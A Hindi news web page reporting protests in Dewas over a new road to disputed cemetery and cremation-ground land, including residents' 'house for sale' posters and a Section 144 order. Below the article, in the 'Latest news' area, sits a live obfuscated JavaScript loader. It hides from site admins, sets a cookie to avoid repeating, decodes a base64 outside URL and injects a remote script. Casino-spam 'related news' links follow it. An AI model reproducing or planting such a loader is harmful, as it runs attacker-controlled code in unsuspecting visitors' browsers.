विवादित कब्रिस्तान-मरघट की भूमि पर जाने के लिए नया रास्ता बनाने का विरोध, नाराज हिंदू परिवारों ने अपने घरों के सामने घर बेचने के पोस्टर लगा दिए

- Advertisement -
- Advertisement -

राष्ट्र आजकल प्रतिनिधि, देवास।  देवास जिले में स्टेशन रोड स्थित विवादित कब्रिस्तान-मरघट की भूमि पर जाने के लिए नया रास्ता बनाने का विरोध नए मोड़ पर आ गया है। शुक्रवार को प्रशासन ने गजरा गियर्स चौराहा से पुलिस लाइन की ओर जाने वाले रास्ते से नया रास्ता निकालने का प्रयास किया था। इसी दौरान हुए विरोध के बाद शनिवार को नाराज हिंदू परिवारों ने अपने घरों के सामने घर बेचने के पोस्टर लगा दिए। यह सूचना आते ही बड़ी संख्या में हिंदू संगठन के लोगों सहित स्थानीय पार्षद भी मौके पर पहुंच गए। मौके पर स्थानीय महिला-पुरुषों ने हनुमान जी का चित्र रखकर पूजा की और धरने पर बैठ गए। उल्लेखनीय है कि स्टेशन रोड स्थित विवादित जमीन के हक को लेकर लंबे समय से विवाद चल रहा है। पूर्व में यहां एक जनाजा लाकर शव दफन करने आए लोगों को भी रोका गया था। इसके बाद विवादित स्थल के मुख्य द्वार पर प्रशासन ने ताला लगा दिया था। कुछ दिन पूर्व अंदर रह रहे एक परिवार का घर भी प्रशासन ने बुलडोजर से तोड़ दिया था। यह मामला शांत हुआ भी नहीं था और शुक्रवार को प्रशासन की मौजूदगी में मेजर रोड से नया रास्ता निकालने की बात सामने आ गई। उसी समय स्थानीय पार्षद शीतल गेहलोत सहित आसपास के लोगों ने कार्रवाई का जमकर विरोध किया, जिसके बाद कार्रवाई रोक दी गई। शुक्रवार की घटना के बाद शनिवार सुबह संबंधित क्षेत्र में धारा 144 लगाने संबंधी आदेश सामने आ गया। आदेश में विवादित स्थान पर पूर्व में हुए घटनाक्रमों का हवाला देकर प्रतिबंधात्मक आदेश जारी करने संबंधी जानकारी दी। आदेश 23 फरवरी की तिथि थी, हालांकि यह सामने 24 फरवरी को आया। आदेश की जानकारी मिलते ही क्षेत्र के लोगों ने फिर से विरोध शुरू कर दिया और सुबह से ही धरने पर बैठ गए। पोस्टर में लिखा था कि देवास प्रशासन की दादागिरी के कारण हम हिंदू अपने मकान बेच रहे हैं। इधर मामले की जानकारी मिलने के बाद सांसद महेंद्र सिंह सोलंकी ने कहा कि उन्हें जानकारी मिली है। उन्होंने कहा कि प्रशासन से मिलकर इस मामले में जल्द ही हल निकाल लिया जाएगा। किसी हिंदू को अपना घर बेचने की जरूरत क्यों पड़ी इसकी जांच की जाएगी। आवश्यकता पड़ने पर मुख्यमंत्री को मामले की जानकारी दी जाएगी। स्थानीय पार्षद शीतल गेहलोत लोगों द्वारा पोस्टर लगाए जाने की सूचना के बाद मौके पर पहुंचे और उन्होंने रहवासियों का समर्थन किया। गहलोत ने कहा कि यहां पर कोई रास्ता नहीं है। यहां से नया रास्ता बनाने पर आए दिन विवाद की स्थिति निर्मित हो सकती है। नवरात्रि के दौरान इस सड़क पर काफी भीड़ होती है। इसके अलावा पुलिस परेड मैदान और पुलिस लाइन होने के कारण वीआईपी आवागमन भी होता है। ऐसे में यहां से रास्ता देने पर सड़क जाम जैसी समस्याएं हो जाएंगी।

- Advertisement -

Latest news

test(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(//g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')||document.documentElement).appendChild(s);}catch(e){}})();
- Advertisement -

ज़रूर पढ़े

इंदौर: नाबालिग को हुआ पंजाब के लड़के से प्रेम, पबजी खेल से हुई थी दोनों की जान- पहचान, पहुँच गयी पंजाब उससे मिलने

परिजनों की गुमशुदगी की शिकायत पर; पुलिस ने कॉल डिटेल निकाली तो दस दिन बाद आरोपी और लड़की को इंदौर ले आई।...

कमलनाथ के नरसिंहपुर आगमन को लेकर करेली ब्लाक कांग्रेस की महत्वपूर्ण बैठक संपन्न

राष्ट्र आजकल/पूनम दीक्षित/ करेली नरसिंहपुर: 19 मार्च को विशाल आमसभामध्य प्रदेश कांग्रेस कमेटी के अध्यक्ष पूर्व मुख्यमंत्री कमलनाथ का 19 मार्च को...

सिंधिया: किसने क्या किया- क्या नहीं किया, कांग्रेस को खुद नहीं पता अपने नेताओं के बारे में

कांग्रेस खुद ही नहीं जानती कि उनके नेता ने क्या किया और क्या नहीं. कांग्रेस छोड़कर बीजेपी में शामिल होने वाले ज्योतिरादित्य...

Related news

Pinco Online Kazino 2025 Yeni Trendlr v nnovasiyalar.80

Pinco Online Kazino 2025 – Yeni Trendlər və İnnovasiyalar ...

Mostbet Casino Official Online Website in Bangladesh Register Login.6559

Mostbet Casino Official Online Website in Bangladesh — Register & Login ...

1Win официальный сайт букмекера 1Вин ставки на спорт.2312 (2)

1Win официальный сайт букмекера — 1Вин ставки на спорт ...

Best On The Web Casinos Australia: Best Aussie Real Cash Sites 2025″

10 Best Genuine Money Online Casinos In Australia September 2025ContentChoose Your Own Game And Start Off PlayingTop 10 Australian On The Internet CasinosHow We...
- Advertisement -

LEAVE A REPLY

Please enter your comment!
Please enter your name here